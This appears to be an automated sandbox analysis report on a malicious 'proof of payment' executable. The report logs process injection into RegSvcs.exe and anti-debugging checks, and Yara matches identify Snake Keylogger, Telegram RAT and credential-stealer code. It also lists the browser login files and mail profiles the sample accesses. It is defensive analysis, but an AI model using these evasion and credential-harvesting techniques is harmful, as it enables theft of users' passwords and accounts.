Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_01001C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_01001C8A
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_01001F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_01001F94
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FCDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 1_2_00FCDDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599219 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598780 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598219 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598108 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597999 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597671 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597433 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597218 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597109 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596672 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596450 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596343 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596234 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596125 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596015 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595906 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595796 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595686 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595578 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595468 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595359 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595249 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595140 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595031 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594922 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594812 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594703 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594593 Jump to behavior
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: RegSvcs.exe, 00000007.00000002.3732329936.0000000001191000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe API call chain: ExitProcess graph end node
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C9548 LdrInitializeThunk, 7_2_067C9548
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_01006AAF BlockInput, 1_2_01006AAF
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FB3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 1_2_00FB3D19
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FE3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 1_2_00FE3920
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FCE01E LoadLibraryA,GetProcAddress, 1_2_00FCE01E
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00A1B768 mov eax, dword ptr fs:[00000030h] 1_2_00A1B768
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00A1CDD8 mov eax, dword ptr fs:[00000030h] 1_2_00A1CDD8
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00A1CD78 mov eax, dword ptr fs:[00000030h] 1_2_00A1CD78
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FEA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 1_2_00FEA66C
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FD81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00FD81AC
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FD8189 SetUnhandledExceptionFilter, 1_2_00FD8189
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C3B008 Jump to behavior
Contains functionality to execute programs as a different user
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FEB106 LogonUserW, 1_2_00FEB106
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FB3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 1_2_00FB3D19
Contains functionality to simulate keystroke presses
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FF411C SendInput,keybd_event, 1_2_00FF411C
Contains functionality to simulate mouse events
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FF74E7 mouse_event, 1_2_00FF74E7
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z30ProofofPaymentAttached.exe" Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FEA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 1_2_00FEA66C
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FF71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 1_2_00FF71FA
Source: z30ProofofPaymentAttached.exe Binary or memory string: Shell_TrayWnd
Source: z30ProofofPaymentAttached.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FD65C4 cpuid 1_2_00FD65C4
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_0100091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW, 1_2_0100091D
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_0102B340 GetUserNameW, 1_2_0102B340
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FE1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 1_2_00FE1E8E
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FCDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 1_2_00FCDDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z30ProofofPaymentAttached.exe PID: 7304, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7712, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.3733442866.0000000003019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z30ProofofPaymentAttached.exe PID: 7304, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7712, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: z30ProofofPaymentAttached.exe Binary or memory string: WIN_81
Source: z30ProofofPaymentAttached.exe Binary or memory string: WIN_XP
Source: z30ProofofPaymentAttached.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: z30ProofofPaymentAttached.exe Binary or memory string: WIN_XPe
Source: z30ProofofPaymentAttached.exe Binary or memory string: WIN_VISTA
Source: z30ProofofPaymentAttached.exe Binary or memory string: WIN_7
Source: z30ProofofPaymentAttached.exe Binary or memory string: WIN_8
Yara detected Credential Stealer
Source: Yara match File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z30ProofofPaymentAttached.exe PID: 7304, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7712, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z30ProofofPaymentAttached.exe PID: 7304, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7712, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.3733442866.0000000003019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z30ProofofPaymentAttached.exe PID: 7304, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7712, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_01008C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 1_2_01008C4F
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_0100923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 1_2_0100923B
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
